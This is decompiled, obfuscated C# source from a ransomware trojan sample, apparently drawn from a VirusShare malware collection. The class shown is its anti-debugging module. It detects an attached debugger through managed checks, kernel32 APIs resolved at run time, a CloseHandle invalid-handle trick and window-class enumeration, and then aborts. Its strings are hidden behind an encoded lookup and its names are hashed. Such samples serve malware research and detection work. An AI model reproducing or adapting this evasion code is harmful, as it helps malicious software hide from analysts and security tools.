// Decompiled with JetBrains decompiler
// Type: A.c6483995e04301d945fdc8bbbeb2fdfcb
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

namespace A
{
  internal class c6483995e04301d945fdc8bbbeb2fdfcb
  {
    internal const uint c815d7d663eef3c44b2caa9f3d6111388 = 1024;
    internal const uint ce1a64a0ce40f52be8d5cd5f2ab8d4bec = 64;
    internal const int c9e8de4583ee928c4800269558d166b7e = 0;
    private static bool c75ea3b951856ad38b52cbf8b6402d522;

    [DllImport("kernel32.dll", EntryPoint = "SetLastError")]
    internal static extern void c391cc9da68ba80667b423713f74af35b(
      uint c3c2d28d090853af7ce1e2c9436d4e6b3);

    [DllImport("kernel32.dll", EntryPoint = "CloseHandle")]
    internal static extern int cace4d6faccfae54b4cce02f5ff6a9d78(
      IntPtr c1511c2036aa4b7ba89764385ca9dba92);

    [DllImport("kernel32.dll", EntryPoint = "OpenProcess")]
    internal static extern IntPtr ccfa0dd8bc046c30e43dcac27b0790853(
      uint c104f3bd454450b5fae258ea4698c08fa,
      int c7e99aabe62df3fabf80d42cf90e0e3f0,
      uint c56f77053e15999af6844efc9bdde822d);

    [DllImport("kernel32.dll", EntryPoint = "GetCurrentProcessId")]
    internal static extern uint c30c15026493b976c2325f72361ac915c();

    [DllImport("kernel32.dll", EntryPoint = "LoadLibrary", CharSet = CharSet.Auto, SetLastError = true)]
    internal static extern IntPtr c70f94891cb4225163b481930fa82b941(
      string c17f152cc83728b20f2e2e392435ccca5);

    [DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
    internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c808000474b78cc57ff5e0ac36b3fcc73 cb3b55426f89535f91bb419e6996e2646(
      IntPtr c6b70c3224512397ad0c3a2798d87e490,
      string c85d99f904a6bb91d7c1a6a0954317af3);

    [DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
    internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cc055647fecedcfcae1eaf4bbad26d609 c6dbc9e316fddad0a9f7623fb3be9ceff(
      IntPtr c6b70c3224512397ad0c3a2798d87e490,
      string c85d99f904a6bb91d7c1a6a0954317af3);

    [DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
    internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cdf87155547dda952c916d9b76727151f(
      IntPtr c6b70c3224512397ad0c3a2798d87e490,
      string c85d99f904a6bb91d7c1a6a0954317af3);

    [DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
    internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c4d8130fdf16941c5a049e8c5637a73b3(
      IntPtr c6b70c3224512397ad0c3a2798d87e490,
      string c85d99f904a6bb91d7c1a6a0954317af3);

    [DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
    internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c8b9df66c099e027db7fe27eeb5d97544 c823a12567a85c9243ae40e47539c1cbb(
      IntPtr c6b70c3224512397ad0c3a2798d87e490,
      string c85d99f904a6bb91d7c1a6a0954317af3);

    [DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
    internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c7dda1f225a33dfcf98fae6f7e3f67461(
      IntPtr c6b70c3224512397ad0c3a2798d87e490,
      string c85d99f904a6bb91d7c1a6a0954317af3);

    private static int c084af11cdc465888c3ed538fb3591a27(
      IntPtr c157a4097f532e5292cc2957be55db66e,
      IntPtr c3ac7a813ea74272766c650f10278c114)
    {
      string[] strArray = new string[1]
      {
        c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2181)
      };
      string strA = c6483995e04301d945fdc8bbbeb2fdfcb.c8859338e5a3695a878c4bf6705d5751e(c157a4097f532e5292cc2957be55db66e);
      foreach (string strB in strArray)
      {
        if (string.Compare(strA, strB, true) == 0)
        {
          c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = true;
          return 0;
        }
      }
      return 1;
    }

    [DllImport("user32.dll", EntryPoint = "GetClassName", CharSet = CharSet.Auto)]
    internal static extern int cbb7fbb3e253592177be35000370dc20a(
      IntPtr c3ffd86e445fc1629a21a22d8b6f86a4b,
      StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490,
      int c668f9f3a61afe17d1174701f81735e18);

    internal static string c8859338e5a3695a878c4bf6705d5751e(
      IntPtr c5de7cfd6591e65c25b36e0738fcc29da)
    {
      StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490 = new StringBuilder(260);
      c6483995e04301d945fdc8bbbeb2fdfcb.cbb7fbb3e253592177be35000370dc20a(c5de7cfd6591e65c25b36e0738fcc29da, cb9c6716f9fec7a6b7c9e19bedc9f2490, cb9c6716f9fec7a6b7c9e19bedc9f2490.Capacity);
      return cb9c6716f9fec7a6b7c9e19bedc9f2490.ToString();
    }

    internal static void cface76737f299c15f46aea51d2f361b6()
    {
      if (c6483995e04301d945fdc8bbbeb2fdfcb.ca73ad72d5e801fc691a6bdacf00b1e12())
        throw new Exception(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2196));
    }

    internal static bool ca73ad72d5e801fc691a6bdacf00b1e12()
    {
      try
      {
        if (Debugger.IsAttached)
          return true;
        IntPtr c6b70c3224512397ad0c3a2798d87e490 = c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2352));
        c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c9d3e290b2a38dccd6dec3b8cbf70f0c7 = c6483995e04301d945fdc8bbbeb2fdfcb.c4d8130fdf16941c5a049e8c5637a73b3(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2377));
        if (c9d3e290b2a38dccd6dec3b8cbf70f0c7 != null && c9d3e290b2a38dccd6dec3b8cbf70f0c7() != 0)
          return true;
        IntPtr num1 = c6483995e04301d945fdc8bbbeb2fdfcb.ccfa0dd8bc046c30e43dcac27b0790853(1024U, 0, c6483995e04301d945fdc8bbbeb2fdfcb.c30c15026493b976c2325f72361ac915c());
        if (num1 != IntPtr.Zero)
        {
          try
          {
            c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cb52fb1903297a0d67737ce529c917679 = c6483995e04301d945fdc8bbbeb2fdfcb.cdf87155547dda952c916d9b76727151f(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2412));
            if (cb52fb1903297a0d67737ce529c917679 != null)
            {
              int pbDebuggerPresent = 0;
              if (cb52fb1903297a0d67737ce529c917679(num1, ref pbDebuggerPresent) != 0)
              {
                if (pbDebuggerPresent != 0)
                  return true;
              }
            }
          }
          finally
          {
            c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(num1);
          }
        }
        bool flag = false;
        try
        {
          c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(new IntPtr(305419896));
        }
        catch
        {
          flag = true;
        }
        if (flag)
          return true;
        try
        {
          c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c92e35801b4eaae7ab7d70e17c0173e9c = c6483995e04301d945fdc8bbbeb2fdfcb.c7dda1f225a33dfcf98fae6f7e3f67461(c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2465)), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2486));
          if (c92e35801b4eaae7ab7d70e17c0173e9c != null)
          {
            c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = false;
            int num2 = c92e35801b4eaae7ab7d70e17c0173e9c(new c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737(c6483995e04301d945fdc8bbbeb2fdfcb.c084af11cdc465888c3ed538fb3591a27), IntPtr.Zero);
            if (c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522)
              return true;
          }
        }
        catch
        {
        }
      }
      catch
      {
      }
      return false;
    }

    [StructLayout(LayoutKind.Sequential)]
    internal class c35ad2d2b7d5d5e5e9092a2e2f7ca2384
    {
      internal IntPtr c7ba91d8fad77443c443bf7d678c49ce5;
      internal IntPtr cbd073e7d3c73e14c44cb6a8c7608c269;
      internal IntPtr ce57239c4110302077b325d4f0ddc2a7e;
      internal IntPtr cbe6898bbda725d30c0f429c4e8b0262e;
      internal IntPtr c4517ace766e7dab5ea383c670cb1d2eb;
      internal IntPtr c6609b7e1d07cfe2dc208c6746a4a790d;
    }

    internal delegate int c808000474b78cc57ff5e0ac36b3fcc73(
      IntPtr ProcessHandle,
      int ProcessInformationClass,
      c6483995e04301d945fdc8bbbeb2fdfcb.c35ad2d2b7d5d5e5e9092a2e2f7ca2384 ProcessInformation,
      uint ProcessInformationLength,
      out uint ReturnLength);

    internal delegate int cc055647fecedcfcae1eaf4bbad26d609(
      IntPtr ProcessHandle,
      int ProcessInformationClass,
      out uint debugPort,
      uint ProcessInformationLength,
      out uint ReturnLength);

    internal delegate int c9d3e290b2a38dccd6dec3b8cbf70f0c7();

    internal delegate void c8b9df66c099e027db7fe27eeb5d97544([MarshalAs(UnmanagedType.LPStr)] string lpOutputString);

    internal delegate int cb52fb1903297a0d67737ce529c917679(
      IntPtr hProcess,
      ref int pbDebuggerPresent);

    internal delegate int cc2644b96756a32d21ac3b9be2d8f2737(IntPtr wnd, IntPtr lParam);

    internal delegate int c92e35801b4eaae7ab7d70e17c0173e9c(
      c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737 lpEnumFunc,
      IntPtr lParam);
  }
}